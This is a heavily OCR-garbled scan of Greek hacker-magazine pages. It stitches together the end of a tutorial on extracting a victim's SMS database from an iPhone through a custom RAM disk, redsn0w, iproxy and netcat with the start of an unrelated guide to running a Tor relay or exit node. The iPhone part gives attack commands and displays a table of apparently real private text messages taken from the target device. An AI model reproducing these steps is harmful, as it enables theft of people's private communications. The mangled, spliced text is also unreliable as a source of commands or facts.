αντιγράψουµε στο εσωτερικό τα anapairnra αρχεία. Па την προσάρτηση 
арк=! να δώσουμε αυτό: 


ns-iMAC:Desktop drg$ 


/dev/disk1 /Volumes/Datahack 


ns-iMAC:MacOS drg$ . 
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redsnüw -r Datahack.dmg | 


Last login: Mon Jul 9 11:59:45 on ttys000 
ns-iMAC:- drg$ iproxy 7777 7 

waiting for connection 

accepted connection, fd = 4 

Number of available devices == 0 

No connected device found, terminating. 
waiting for connection 


49 — nc— 74x25. 
Last login: Mon Jul 9 12:12:25 on ttys001 
ns-iMAC:- drg$ nc localhost 7777 > SMS.tar 


All your iPhones are belong to us! 
MP 


Тора μπορούμε va προσθέσουμε τα προγράμματα nou κατασκευάσαμε 
νωρίτερα καθὼς και όλους τους προβλεπόμενους φακέλους, ώστε TO 
RAM disk να έχει τη δομή ενὸς δίσκου µε то iOS: 
ns-iMAC:Desktop drg$ pushd /Volumes/Datahack 
ns-iMAC:Desktop ἀγρῷ mkdir dev files sbin mnt 
ns-iMAC:Desktop drg$ popd 
ns-iMAC:Desktop drg$ cp launchd /Volumes/Datahack/sbin/launchd 
ns-iMAC:Desktop drg$ chmod 755 /Volumes/Datahack/sbin/launchd 
ns-iMAC:Desktop drg$ cp payload /Volumes/Datahack/files/payload 
ns-iMAC:Desktop drg$ chmod 755 /Volumes/Datahack/files/payload 


Σε αυτό το στάδιο θα χρειαστούν και µερικἀ αρχεία, ra onoia βρίσκονται 
μόνο σε ἑνα jailbroken iPhone. Πα ευκολία, εσεὶς µπορείτε να πάρετε то 
αρχείο sysfiles.rar, μέσα апо το iOSattack.zip που έχετε ἠδη κατεβάσει. 
Αφού κατεβάσετε κι αποσυμπιέσετε то RAR µε τα αρχεία, apkei να τα 
αντιγράψετε στο προσαρτημένο αρχείο εικὀνας του RAM disk. Αν π.χ. та 
έχετε αποσυμπιέσει στο desktop, μεταβείτε στον σχετικὀ κατάλογο ка! 
δώστε τα ακόλουθα: 


ns-iMAC:Desktop drg$ cp sh /Volumes/Datahack/files Εικόνα 7. 
ns-iMAC:Desktop drg$ cp tar /Volumes/Datahack/files TIapaTITPOUNE он 
ΤΟ payload εκτε- 
ns-iMAC:Desktop drg$ ср libncurses.5.dylib /Volumes/Datahack/ λείται µε επιτυχία. 
files Ta δεδοµένα rou / 
А р : А private/var/mobile/ 
Όταν τελειώσουμε τη διαδικασία της αντιγραφἠς κάνουμε unmount τη SMS συμπιέζονται 
RAM disk δίνοντας: και μεταφέρονται 
στον υπολογιστή 
ns-iMAC:Desktop drg$ hdiutil unmount /Volumes/Datahack μας! Σημειώστε ΟΤΙ 
А : η µεταφορά rou 
/Volumes/Datahack" unmounted successfully. πακέτου ue ra SMS 
: . . διαρκεί το πολύ 
Εκκίνηση апо τη RAM disk éva λεπτό... 
Σε αυτὀ то στάδιο έχουμε KATA- App LeD1755PMUPower Sour 
n 1 Д oe USBHost 
σκευασει TO αρχειο, εικονας TOU App LeEmbeddedUSBRr bitrator ust 
RAM disk, µε ro οποίο θα npaypa- фе Дан : cableType: U 
А 1 И рр LeEnbeddedUSBRrb і tr : папой οἱ 
Tonoinooupe την επίθεση. Έχουμε leTypeChange : Connented to a use " Г 
επομένως φτάσει στο τελικὀ ота- RppleSSL8728XUSBPhy::powerUÜp : powered 
h , Е 8 x 
διο. Τώρα, πρεπει va χρησιµοποιῃ RppLeEnbeddedUSBRrbi trator : :enabLeDevice 
соор αυτο TO αρχειο εἰκονας για Clock : enable: 1, index: 6 
να δημιουργήσουμε ro RAM disk RppleSynopsysÜTGDev ice : :handLeUSBReset 
στη συσκευἠ-στὀχο. Па TO σκο- ο mapaystiTGDavice: :handlelSBReset 
T АР я ippLeSynopsysÜüTGDevice : :handLeUSBReset 
по αυτο θα χρησιμοποιήσουμε TO sending contents of /private/var/nobile/ 
redsnOw  (http://blog.iphone-dev. Library/SHMS... 
org). Αφού εγκαταστήσουµε την creating pipe /bin/tar -c /private/var/n 
πιο πρὀσφατη ἐκδοση, μπορούμε obi Le/Library/SMS... 
va συνδέσουµε τη συσκευἠ στον сс QS bytes | 
, р А е. 
а μας αν δώσουμε κάτι rebooting device in 18 seconds. 


ns-iMAC:MacOS drg$ ./redsnOw 
-r Datahack.dmg 


Ακολουθώντας τις οδηγίες που θα 
εμφανίσει το redsnOw στην οθὀνη, 
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θα θέσουμε τη συσκευἠ σε DFU mode (Device Failsafe Utility ἡ Device 
Firmware Upgrade). Μετά anó Муо, εφόσον πάνε ола кала, στην οθόνη 
TOU iPhone θα εμφανιστεί το μήνυμα: daemon is listening оп ТСР:7. Αυτό 
σημαίνει от! TO iPhone ἐχει ανοίξει ¿va port στη θύρα 7 και περιμένει για 
μια σύνδεση ТСР. Χρειαζόμαστε ἑνα εργαλείο το οποίο va enikorvovei 
δικτυακά --αλλά µέσω rou USB-- χρησιμοποιώντας ro μηχανισμό του 
usbmux. 


Ένα δημοφιλές εργαλείο nou κάνει αυτή τη δουλειά εἶναι то iProxy. Ano- 
ТЕЛЕ! μέρος του πακέτου usbmuxd και μπορούμε να ro κατεβάσουμε апо 
το 


http://cgit.sukimashita.com/usbmuxd.git ἡ να πάρουμε απευθείας το ap- 
х=ю usbmuxd-1.0.8.tar.gz, µέσα апо то iOSattack.zip. Προφανώς, μετὰ 
τη λήψη ακολουθεί η εγκατάσταση. Па aurr| την εργασία θα χρειαστεί va 
κατεβάσουμε και va εγκαταστήσουμε та MacPorts (www.macports.org, βλ. 
και http://deltahacker.gr/?p-2005). Αμέσως μετά πρέπει να εγκαταστή- 
coups μερικὰ ακόµα προγράμματα, апо τη γραμμή εντολών: 


ns-iMAC:Desktop drg$ sudo port selfupdate 
ns-iMAC:Desktop drg$ sudo port install cmake libusb libplist 


Τέλος, δημιουργούμε ἑνα symbolic link προς ro libusb.h, το οποίο апа!- 
τεἰται και θα αξιοποιηθεἰ αργότερα апо το usbmuxd: 


ns-iMAC:Desktop drg$ 1η -s /opt/local/include/libusb-1.0/ 
libusb.h /opt/local/include/libusb.h 


Μετά апо αυτά ra ατελεἰωτα βήματα, μπορούμε πλέον va αποσυµμπιέσου- 
НЕ τον κὠδικα του usbmuxd και να rov µεταγλωττίσουμε. Па τον σκοπὀ 
αυτό αρκεί να εκτελέσουµε τα ακόλουθα: 


ns-iMAC:Desktop ἀγρῷ tar -zxvf usbmuxd-1.0.8.tar.gz 
ns-iMAC:Desktop drg$ cd usbmuxd-1.0.8 
ns-iMAC:Desktop drg$ cmake . 

ns-iMAC:Desktop drg$ make 

ns-iMAC:Desktop drg$ sudo make install 


Αυτό ἠταν! Тора μπορούμε να χρησιμοποιήσουμε то iproxy, ώστε να 
συνδἑέσουµε τον υπολογιστή µας µε то iphone. Δεν ξέρουμε av το &gxà- 
care, αλλά ro payload περιμένει (ακόμα) yia va µας στείλει το πακέτο µε 
τα μηνύματα του θύματος. Н Apple χρησιμοποιεί ша nio γρήγορη ἐκδοση 
του usbmuxd, σε σχἑση µε αυτἠ nou εγκαταστήσαμε. Επομένως θα xpn- 
σιµοποιήσουμε αυτήν, μαζὶ ωστόσο µε το iproxy, το οποίο προήλθε апо 
το εγκατεστημένο usbmuxd... 


ns-iMAC:Desktop drg$ sudo launchctl load /System/Library/ 
LaunchDaemons/com.apple.usbmuxd.plist 


ns-iMAC:Desktop drg$ iproxy 7777 7 


Μόλις αρχίσει η λειτουργία rou iproxy, η θύρα 7777 του υπολογιστή µας 
θα συνδεθεἰ µε тп θύρα 7 του iPhone. Тора, µε τη βοήθεια του γνωστού 
προγράμματος netcat θα δημιουργήσουμε µια νέα σύνδεση. Αυτή η σύν- 
δεση θα προκαλέσει την εκτέλεση rou payload к! ἐτσι τα πακέτα δεδο- 
μένων θα αρχίσουν να ρέουν апо то iPhone προς τον υπολογιστή µας. 
Προφανώς, όλα αυτά τα πακέτα θα πρέπει να τα ανακατευθύνουμε προς 
κάποιο αρχείο. Αυτό επιτυγχάνεται πληκτρολογώντας кат! τέτοιο: 


All your iPhones are belong to us! 
ПИ 


ns-iMAC:Desktop drg$ nc localhost 7777 > SMS.tar 


Αν ἐχουν πάει ола кала, στην οθόνη rou iphone θα δούμε ro μήνυμα 
"sending contents of /SMS", ενὠ την ἴδια στιγµή στον υπολογιστή θα 
δημιουργείται το αρχείο SMS.tar. 


Ὅταν ολοκληρωθεἰ η λήψη του SMS.tar, μπορούμε va το апосирпіёсоо- 
µε και va το ανοίξουμε µε rov sglitedbrowser (http://sourceforge.net/ 
projects/sqlitebrowser). Σημειώστε Ori, μετά την αποσυμπἱεση, да npo- 
κύψει ша δοµἠ καταλόγων παρόμοια p’ εκείνη εντὸς rou iPhone. Έτσι, 
για να βρούμε το αρχείο µε τα μηνύματα, πρέπει να ακολουθήσουμε то 
σχετικὀ path: 


ns-iMAC:Desktop drg$ tar -xvf SMS.tar 
ns-iMAC:Desktop drg$ cd /private/var/mobile/Library/SMS/ 
ns-iMAC:Desktop drg$ cat sms.db 


О επἰλογος... 


Н διαδικασία nou μελετήσαμε εἶναι µακροσκελἠς. Ωστόσο, µε την KA- 
τάλληλη προετοιμασία, &мас επιτιθέμενος μπορεί να πραγματοποιήσει 
την επίθεση σε «ελάχιστοξ χρόνο. Πα παράδειγµα, ἑνας αποφασισμένος 
iPhone attacker θα μπορούσε να ετοιμάσει πολλὲς εκδοχὲς rou payload, 
καθεμία апо τις οποίες θα ἐκλεβε διαφορετικἀ στοιχεία. Επιπρόσθετα, 
ο αδίστακτος επιτιθἐµενος θα ετοίμαζε ка! µια κατάλληλη εκδοχἠ του 
launchd, για κάθε ἐκδοση rou iOS. Με ашта τα σύνεργα, θα αρκούσε va 
πάρει στα χέρια του τη συσκευἠ-στόχο για λίγα μόλις λεπτά! Εἶναι pavs- 
ро, λοιπὸν, от! θα πρέπει να εἰμαστε ιδιαίτερα προσεκτικοί. Н ἐκδοση του 
iOS της συσκευἠς µας, ὁπως και το αν εἶναι σπασμένο ἡ ὀχι, δεν παίζουν 


κανέναν ρόλο. Από την επίθεση nou περιγράψαμε δεν γλυτώνει κανεὶς! Εικὀνα 8. 
Επομένως, θα ἧταν φρόνιμο va έχουμε το κινητὀ πάντα εντὸς TOU ONTI- τι 
кой µας πεδίου και γενικότερα, να µην το δίνουμε ποτὲ σε αγνώστους ἡ πουµε бла та npo- 
απλά... γνωστούς. σωπικἀ μηνύματα 


του θύματος :5 
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та o es fjv] er f [E] f] ЕЕ = == 
Table: [messa СА] [C New Record || Delete Record | 


lem. je. jflags replace sve, center. |groupld πεκοεία. 
1339884616 _ OAWEGOYME ATOTEPA ТЕЛКА? | 1 

1339885151 ПОУВЕА ТОРА? | 
1133988235. | 
1339886925 OK ΠΑ ΜΠΑΝΑΚ АТРО | 
1339927724 ЕРХОМАТ | 
1340195012 NA ZE ΠΑΡΌΥΜΕ ΤΗΛΕΦΩΝΟ NA ΣΕ РОТНЕОУМЕ КАТИ | 

| ον πίνω τη qute БИЛ 


1340265822 — 
1340267583 Абу που εισαι 


ακόμα σε βασανίζουνε) 


| 

] 

] 

] 

1340392674 ΕΙΣΤΕ ΜΕΓΑΛΑ ΠΑΙΚΤΡΟΝΙΑ Ol ] 
1340433205 E-SHOP.GR - ΚΑΤΑΣΤΗΜΑ. Н ПАРАГГЕМА АХ ΕΙΝΑΙ ΕΤΟΙΜΗ. ΜΠΟΡΕΙΤΕ NA ΠΕΡΑΣΕΤΕ NA ΤΗΝ ПАРАЛАВЕТЕ | 
| 

| 

| 

| 

] 


3 
ES x | 2 228 
sr 1340435541 КАЛНМЕРА, ΘΑΕΡΘΕΙ͂Σ ТЕЛКА ПА ΜΠΑΝΙΟ КАМ NALTI ΩΡΑ AN ΒΟΛΕΥΕΙ OA ΣΕΠΕΡΜΕΝΟΥΜΕ.. 2 212 
58 1340435674 3 213 
50 | 1059 +306 1340437015 ТО ΑΠΟΓΕΥΜΑ КОЛЯ OA ΕΠΙΣΤΡΕΝΟΥΜΕ. ПАТИ EXO NA ПАП EE ΓΕΝΕΟΝΑ. ΑΠΟΦΑΣΙΖΕΙΣ К ΜΑΣ AEE.. 2 213 
(ва 1060 «30694: 1340444514 ΕΙΜΑΣΤΕ central 2 229 
σι 1340499204 ЕРХОМАГ AN OEE 2 212 

С 1340524417 ΕΙΧΑΤΕ 1 ΚΛΗΣΗ. 2 

2 


G] 1340530487 ХАТЕ 1 ΚΛΗΣΗ: 
54 1340562751 FIXATE 1 ΚΛΗΣΗ: 

1340609072 Ειμαι σπίτι εχω μεγάλη αγωνία στ λίγο θα βγοῦν τα αποτελέσµατα των εξετάσεων της. 

1340645588 ΑΥΡΙΟ ΕΚΛΟΓΕΣ ΕΜΔΥΔΑΣ ΑΤΤΙΚΗΣ ΣΤΟ ΕΜΠ ΕΠΙ ΤΗΣ QAOY ΠΑΤΗΣΙΩΝ ΑΠΟ ANM ΕΩΣ 8MM. VHGIZOYME ΜΕ ΤΗΝ ΤΑΥΤΟΤΗΤΑ ΜΑΣ. ΕΧΕΙ ΔΟΘΕΙ ΑΔΕΙΑ ΣΕ ΟΛΕΣ ΤΙΣ ΥΠΗΡΕΣΙΕΣ. 
1340724192 ΤΕΛΙΚΑ AEN ΔΟΥΛΕΥΩ ΤΑΞΙ, ΟΠΟΤΕ ΘΑ ΕΡΘΩ ΘΕΑΤΡΟ. 


ыы 


1340957761 EIXATE 2 ΚΛΗΣΕΙΣ: 
1340957761 EIXATE 2 ΚΛΗΣΕΙΣ: 
1340954428 E-SHOP.GR - ΚΑΤΑΣΤΗΜΑ. H ΠΑΡΑΓΓΕΛΙΑ ΣΑΣ ΕΙΝΑΙ ΕΤΟΙΜΗ. ΜΠΟΡΕΙΤΕ NA ΠΕΡΑΣΕΤΕ ΝΑ ΤΗΝ ΠΑΡΑΛΑΡΕΤΕ. 

1340989222 Θα μαζευτούμε µε φίλους σπίτι μετά τις 9 αν θέλεις ελα. 

1341047086 ΓΙΝΑΜΕ 30 ΚΑΙ ПОРТАРОУМЕ ΜΑΖΙ 30% ΕΚΠΤΩΣΗ ΣΕ ОЛА ΤΑ ΠΡΟΙΟΝΤΑ ΜΑΣ ΜΟΝΟ ΓΙΑ ΤΗ ΔΕΥΤΕΡΑ 02/07. ΣΑΣ ΠΕΡΙΜΕΝΟΥΜΕ! ΦΞΑΙΡΗΙ. ΚΙΝΤΉΛΙ 
1341049839 Freephoo validation code 


| 
| 1341307942 ME TH COSMOKAPTA ΜΠΟΡΕΙΣ NA ΕΧΕΙΣ 80 ΠΡΟΣ ОЛА TA EGNIKA ΚΙΝΗΤΑ & ΣΤΑΘΕΡΑ ΔΙΚΤΥΛ ПА 1 MHNA ΜΌΝΟ ME 7Є ПА ΤΗΝ ATOPA TOY ΠΑΚΕΤΟΥ KAAESE AQPEAN STO 1330 | 
1341391420 FIXATE 2 ΚΛΗΣΕΙΣ. ji 

| 

| 

| 
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Skill: 
Intermediate 


Tags: anonymity, 
tor, relay node, 
exit node, exit 
policy, hidden 
services 


Τι да λέγατε av σας πρότειναν va αναλάβετε ro ρὀλο ενὸς І 
μυστικού πράκτορα, σε ша μυστικἠ αποστολἠ μεταφοράς 


ευαίσθητων μηνυμάτων; Ακούγεται συναρπαστικὀ, 
ἐτσι δεν εἶναι; Θα συμφωνήσουμε, αλλά πρέπει να σας 
θυμίσουμε ὁτι κάτι τέτοιο θα ἧταν kai ἄκρως επικἰνδυνο. 
ЕуаЛЛактика, μπορείτε να στήσετε ἕνα Tor relay node ἡ 
éva Tor exit node kai va συνεισφἑρετε στο δίκτυο Tor, 
μεταφέροντας криптоурафпнёуа μηνύματα, πἐρα-δώθε! 
Ki αν ἐχετε διάθεση για ακόµα πιο ενεργἠ ανάµειξη στο 
“κύκλωμα”, μπορεῖτε va σηκώσετε ша δικτυακἠ υπηρεσία 6 
αποκλειστικἀ *=утос* του Tor network... pe d? 
> 


WV'HAGIKER 


ÁN 


Στο deltaHacker 007 (Απρίλιος 2012) γνωρίσαμε ro κρυφὀ κομμάτι του 
Internet, то λεγόμενο deep web, µέσα anó το Oikruo Tor. Στο napóv 
ἆρθρο θα εμβαθύνουμε στη λειτουργία αυτού του ευφυέστατα στημὲ- 
νου δικτύου και θα δούμε пос μπορούμε να συμμετάσχουμε σε αυτό 
ενεργά! Όπως αναφέραμε και στο προηγούμενο ἀρθρο, κάθε фора nou 
συνδεόὀµαστε στο Tor ra δικτυακἀ µας πακέτα διέρχονται (κρυπτογραφη- 
μένα) апо µια τυχαία κατασκευασμένη αλληλουχία апо Tor nodes. Στο 
τέλος αυτής της μυστικἠς διαδροµἠς εξἐρχονται προς ro απλό” Internet, 
µέσω κάποιου Tor exit node. B£- 

Baia, órav επισκεπτόµαστε κάποια 

τοποθεσία rou deep web, ra пакё- 

τα µας παραμένουν στο δἰκτυο Tor 


— 


αυτὲς οι έννοιες σας ξενίζουν, µην 


ό Р [i / και καταλήγουν σε μηχανήματα µε 
Y ó IB[BIC| τα λεγόμενα hidden services. Av 


ται 


Η λειτουργία ενός 
Tor relay είναι va 
μεταφέρει ra δεδο- 
μένα του δικτύου 
(κρυπτογραφη- 
μένα) προς алла 
relays ἡ ка! Tor 
exit nodes. Κάθε 
фора δημιουργείται 
ένα νέο κύκλωμα, 
κάνοντας το δίκτυο 
пара πολύ ασφα- 
λὲς ΚΙ ανώνυμο. 
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ανησυχείτε καθόλου. Σε λἰγο θα τις 
γνωρίσετε καλὰ και μάλιστα στην 
πράξη. Eire θέλετε να συμμετάσχε- 
τε στο Tor ως ἑνας аплёс̧ κόμβος 
gite να αποτελέσετε πἐρασµα апо 
το Tor προς το απλὀ Internet εἰτε 
να σηκώσετε τη δικἠ σας υπηρεσία 
στο deep web, θα σας δείξουμε όλα 
τα απαραίτητα βήματα! 


Sè 
Ei 


Εγκατάσταση και βασικἠ ρύθμιση 


Θα ξεκινήσουμε µε τη συμμετοχή στο δίκτυο Tor ως ἑνας κόμβος δια- 
κίνησης δεδομένων. Να πούμε εδὠ от! θα ασχοληθούμε µε ro Linux και 
µόνο, καθώς η χρήση Windows για µια τέτοια δουλειά θα αποτελούσε 
εσφαλμένη επιλογή -- και μάλιστα για πολλούς λόγους1. Н διανοµἠ στην 
οποία δουλέψαμε εμεὶς εἶναι το Ubuntu 12.04, το опо!о κι εγκαταστήσαμε 
σ’ èva VMWare VM. Φυσικά, η δημιουργία ενὸς Tor exit node στο σπίτι δεν 
αποτελεί την καλύτερη επιλογἠ, αλλά για μερικὲς δοκιμές πριν αρχίσουμε 
τις εγκαταστάσεις σε κἄποιο VPS δεν υπάρχει κανένα πρόβλημα. 


Δείτε πόσο εὐκολα γίνεται η εγκατάσταση: 


sudo apt-get update 
sudo apt-get install tor 


Πέρα апо τη χρήση rou Tor yia προστασία της ανωνυμίας, опос θα δούμε 
σε Лүо µε ro tor μπορούμε ν΄ αναλάβουμµε κι ενεργούς ρόλους εντὀς του 
ομώνυμου δικτύου. Σε кад= περίπτωση, το tor τρέχει στο σὐστημά µας 
ως Server ка! μπορούμε va το ξεκινήσουμε, να το σταματήσουμε κι επα- 
νεκκινήσουμε µε TO γνωστὸ τρόπο: 


sudo service tor start 
sudo service tor stop 
sudo service tor restart 


Αν δεν πειράξουμε τίποτα η υπηρεσία tor λειτουργεί σαν γέφυρα (proxy) 
TOU συστήματὀὸς µας προς το δίκτυο. Σε λίγο θα απενεργοποιἠήσουµε αυτἠ 
τη λειτουργία, µιας και µας εἶναι εντελὠς άχρηστη γι’ αυτὀ που θέλουμε 
να πετύχουμε. Το αρχείο ρυθμίσεων rou Tor ονομάζεται torrc και βρἰσκε- 


1. Σκεφτείτε την ασφάλεια, την κατανάλωση πόρων (ενεργειακὠν κι επεξεργαστικὠν), τα γιγάντια καλαμάρια 
και διάφορα ἀλλα... 


Mnette στο κύκλωμα, ενεργά! 
MV 


28 дїаппоџд@Фибипёц: ~ 


k. 


m 
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ται στον κατάλογο /etc/tor. Oi ρυθμίσεις που περιλαμβάνει χωρίζονται 
σε тріа κύρια µέρη: То прото σχετίζεται µε τη χρήση rou server για 
την απλἠ σύνδεση στο Oikruo Tor (Tor client). Το δεύτερο µέρος ἐχει τις 
ρυθμίσεις του server που αφορούν στη λειτουργία διακίνησης πακέτων 
ЕУТОС του δικτύου Tor (Tor relay). Το τρίτο περιλαμβάνει επιλογές για τη 
λειτουργία του server ως πύλη εξόδου απὀ το δίκτυο Tor просто Internet 
(Tor exit node). Όπως αντιλαμβάνεστε, εμεἰς μπορούμε να απενεργοποι- 
ἡσουμε οποιαδήποτε λειτουργία, ανἀ πάσα στιγμή. Па αρχἠ θα απενερ- 
γοποιήσουμε τη δυνατότητα σύνδεσης στο δίκτυο Tor ως απλοἰ clients, 
αφού δεν µας χρειάζεται για τις δοκιμὲς µας. Па το σκοπὸ αυτό, αρκεί να 
ανοἰξουµε το torrc µε τον αγαπημένο µας text editor: 


sudo nano /etc/tor/torrc 


Тора πρέπει va εντοπἰσουμε τον ορισμὀ rou SocksPort, στις πρώτες 
γραμμές του αρχείου. Εκεἰ, поло апла, да αλλάξουμε την τιµή του σε 
μηδέν. Επιπρόσθετα, πρέπει να βάλουμε µια δίεση (4) μπροστὰ апо rov 
ορισμὀ του SocksListenAddress, για να απενεργοποιηθεί. Μετὰ τις αλλα- 
γὲς nou περιγράψαμε, οι σχετικἐς επιλογἐς θα μοιάζουν κάπως έτσι: 


SocksPort 0 
8SocksListenAddress 127.0.0.1 


Το µόνο nou μένει тора εἶναι µια επανεκκίνηση rou Tor, оте να λάβει 
υπόψη του τις νέες µας ρυθμίσεις. Μετά κι апо auro, ro Tor δεν да npo- 
σφἑρει απολύτως τίποτα σαν εφαρµογή! Ωστόσο, аот η κατάσταση θα 
αλλάξει поло σύντομα. 


Πριν προχωρήσουμε σε αυτὲς καθαυτὲς τις λειτουργίες του Tor server, 
οφείλουμε να κάνουμε λίγες ακόµα χρήσιμες ρυθμἰσεις. Θα ενεργοποι- 
ἡσουμε το logging και θα ορίσουµε µια διεύθυνση email. Το прото εἶναι 
απαραίτητο για να έχουμε µια καλὴ εποπτεία όσων συμβαίνουν στο oÙ- 
στημὰ µας σε σχέση µε то Tor, ενώ το δεύτερο χρειάζεται για την επικοι- 


Ξεκινάμε το Tor 
για πρώτη φορά... 
Όλες οι λειτουργίες 
του (τουλάχιστον 
αυτὲς που µας 
ενδιαφέρουν) εἰναι 
απενεργοποιημέ- 
νες. Αυτὀ σε λίγο 
Θ΄ αλλάξει! 


To αρχείο ρυθμίσεων 
του Тог ονομάζεται 
torrc ка! περιέχει 
κάθε εἰδους επιλογή, 
για та поли Baciká 
μέχρι τα πολύ σύν- 
θετα. 
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vovia µε ἄλλα µέλη του δικτύου Tor στην περίπτωση nou προκύψει ка- 
ποιο πρὀβλημα. Aur£g οι δύο ρυθμίσεις βρίσκονται λίγο χαμηλότερα anó 
εκείνες nou κάναμε προηγουμένως. Па την ενεργοποίηση rov log, аркі 
va ενεργοποιήσουµε ολόκληρη τη σχετικἠ γραμμὴ αφαιρώντας τη δίεση 
στ’ αριστερά. Н σχετικἠ γραμμή θα πρέπει να γίνει κάπως &т01: 


Log notice file /var/1log/tor/notices.log 


Па τον ορισμὀ των στοιχείων επικοινωνίας, εἶναι βολικὀ va χρησιµοποι- 
ἡσουμε τη δυνατότητα αναζήτησης του εκάστοτε text editor2. Αρχικά 
πρέπει να βρούμε τον ορισμό του nickname και να δηλώσουμε va... 
nickname: 


Nickname TORAFun 


Εντάξει, το δικὀ µας δεν апотЕЛ=! προϊόν ιδιαίτερης φαντασίας και £u- 
φυΐας, αλλά εσεἰς μπορείτε να βάλετε καλύτερο! Στη συνέχεια, пал 
НЕ τη λειτουργία αναζήτησης rou editor, πρέπει να βρούμε τον ορισμὀ 
ContactInfo. E% εισάγουµε éva ὀνομα και µια διεύθυνση αλληλογραφί- 
ας. Προφανώς то буора δεν χρειάζεται να εἶναι το αληθινὀ, αλλά η διεύ- 
θυνση αλληλογραφίας πρέπει να υπάρχει και να µας ауйк=!. Διαφορετικά, 
η ρύθμιση αυτἠ δεν да ἐχει κανένα νόημα: 


ContactInfo Jim «jimbeam AT den sas lew.com» 


Μην κρἰνετε апо την παραπάνω γραμμή. Στο δικὀ µας torrc δώσαμε αλη- 
θινἠ διεύθυνση αλληλογραφίας. Σημειώστε επἰσης от! η πληροφορἰα 
αυτή εἶναι ανιχνεύσιμη апо το Google, επομένως η διεύθυνση πιθανώς 
να πέσει σε χέρια spammer. Καλύτερα λοιπὸν να δώσετε va email που 
δεν σας πολυνοιάζει αν ξαφνικά αρχίσει να δέχεται SPAM. 
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2. Στην περίπτωση rou nano πατάμε [CTRL-4-W], πληκτρολογούμε auró nou ψάχνουμε και δίνουμε [Enter]. 


Μπείτε στο κύκλωμα, ενεργά! 
MVP 
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X 


я 


Tor relay node 


Ένας κόμβος Tor relay βοηθάει πολὺ στη µεταφορά δεδοµένων ка! κατ΄ 
επέκταση στη γενικότερη λειτουργία του δικτύου Tor. Σκεφτείτε от! то 
αντίστοιχο μηχάνημα да баку! va μέρος των πακέτων του δικτύου 
και κατ’ αυτὸν τον τρόπο θα "ξεφορτώσει” ελαφρώς τα υπόλοιπα Tor 
relays. Όταν µετατρέπουµε το σὐστημά µας σε Tor relay, τα δεδομένα 
που διέρχονται апо αυτό εἶναι πλήρως κρυπτογραφημένα και κινούνται 
προς άγνωστους προορισμούς. Πρόκειται για αιτήματα και απαντήσεις 
που ανήκουν σε χρήστες εντὸς του δικτύου Tor και σε server εντὸς ἡ 
εκτὸς του deep web. Έχετε υπόψη σας от! οι ISP δεν τα пӣу και πολύ 
кала µε το δίκτυο Тог. Στις περισσότερες περιπτώσεις δεν да νοιαστούν 
καθόλου αν σηκώσουμε ёха Tor relay node, αλλά кало да ἦταν va επικοι- 
νωνήσουµε прота pai τους. 


Αν βεβαιωθούμε от! δεν υπάρχει κανένα πρὀβλημα µε τον ISP µας, pno- 
ρούμε να ξεκινήσουμε τις δοκιμές афоВа. Н μόνη ρύθμιση που χρειάζε- 
ται εἶναι να ενεργοποιἠήσουµε τον ορισμό ORPort (Σ.τ.Α. Όχι, δεν λείπει 
το «Τ»). Πρόκειται για την порта ТСР στην οποία θα ακούει то Тог για 
νέες συνδέσεις. Φυσικά, αν χρησιμοποιούμε σύστημα nico апо κάποιο 
firewall, θα πρέπει va ανοίξουμε το αντἰστοιχο port ἠ/και va επισκεφθού- 
µε τις ρυθμίσεις του router µας και να φροντίσουμε για το κατάλληλο 
port-forwarding. Н γραµµή µε το ενεργοποιημένο ORPort, φαίνεται Kå- 
πως έτσι: 


ORPort 9001 


Παρεμπιπτόντως, av αποφασἰσουµε va λειτουργήσουμε σαν relay, θα 
ἠταν кало va ενεργοποιἠήσουµε το λεγόμενο διαμοιρασμὀ κόμβων. Про- 
ката! για µια λειτουργία που επιτρέπει στον кӧрВо µας να διατηρεϊἰ και να 
δημοσιεύει πληροφορἱες για τους υπόλοιπους κόμβους. Όπως αντιλαμβά- 
νεστε, αυτή η λειτουργία Вопда στην οµαλότερη λειτουργία ολόκληρου 


H ORPort εἶναι η 
βασικότερη θύρα 
του πρωτοκόλλου. 
Εδώ γίνονται όλες 
0I συνδέσεις, &ТЕ 
έχουμε ρυθμίσει 
τον kóuBo µας σαν 
relay &ТЕ σαν exit 
node. 
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чани 
VHA@KER 
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Αποφασίσαμε о 
κόμβος va µην 
επιτρέπει καμία 
εξωτερική σύνδε- 
ση. Θα λειτουργεί 
αποκλειστικά ως 
Tor relay, δηλαδή. 
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TOU δικτύου, Хор!с va επιβαρύνει ιδιαίτερα ro σύστημά рас. Πα va την 
ενεργοποιήσουµε apkei va να βγάλουμε τη δίεση апо τα αριστερά του 
DirPort: 


DirPort 9030 


Παρεμπιπτόντως, αν θέλουμε va βοηθήσουμε праүратіка την κοινότητα 
TOU Tor, кало θα ἦταν va επιλέξουμε τη θύρα 443 για ro ORPort και την 
80 yia το DirPort. Πολλοί χρήστες, βλέπετε, βρίσκονται πίσω апо firewall 
που επιτρἐπουν την επικοινωνία μόνο µέσω αυτών των θυρών. 


Tor exit node 


Μια στιγμή! Αυτὸ Χρειάζεται λίγη σκέψη... Μετατρέποντας ro unxàvnuaà 
μας σε Tor exit, εἶναι σαν να ro µετατρέπουµε с’ &van τεράστιο router 
μέσω του onoiou μπορεἰ να βγαϊνει οποιοσδήποτε στο Internet! Σηκώνει 
кат! τέτοιο η γραμμὴ µας; Υπάρχει κι ἑνα ακόμη ζήτημα. Ὅταν κάποιος 
χρήστης rou Tor Вуа!\=! апо το δικὀ µας μηχάνημα στο Internet και gni- 
σκέπτεται ша δικτυακἠ υπηρεσία, οι αντἱστοιχοι server βλέπουν το δικὀ 
μας μηχάνημα, ὀχι το дико του. Με ἄλλα λόγια, νομίζουν от! εἰμαστε εμείς 
που έχουμε συνδεθεἰ σε αυτούς. Προφανώς, опо φυσιολογικὲς συνθήκες 
αυτό δεν αποτελεἰ πρόβλημα. Ωστόσο αν οι χρήστες του Tor οι οποίοι 
εξἐρχονται στο Internet апо το дико µας µηχάνηµα προβαίνουν σε пара- 
VOEG δραστηριότητες, θα βρούμε ro μπελὰ µας! Αυτή η λειτουργία, λοι- 
пом, θέλει τεράστια προσοχή. Επειδἠ πάντως ενδέχεται να σας τρομάξαμε 
арк=та, кало εἶναι тора να σας πούμε ка! кат! καθησυχαστικὀ: Μέχρι 
στιγμἠς δεν υπήρξε потё σοβαρὀ πρόβλημα, για κανέναν διαχειριστἠ Tor 
exit node. Μάλιστα στο επἰσημο blog rou Tor θα βρείτε ¿va παρεμφερὲς 
post, µε ιδιαίτερο ενδιαφἐρον. Πρόκειται για την ιστορἰα ενὸς διαχειριστἠ 
κάποιου Tor exit node ο οποίος αναφέρει τα προβλήματα που συνάντησε, 


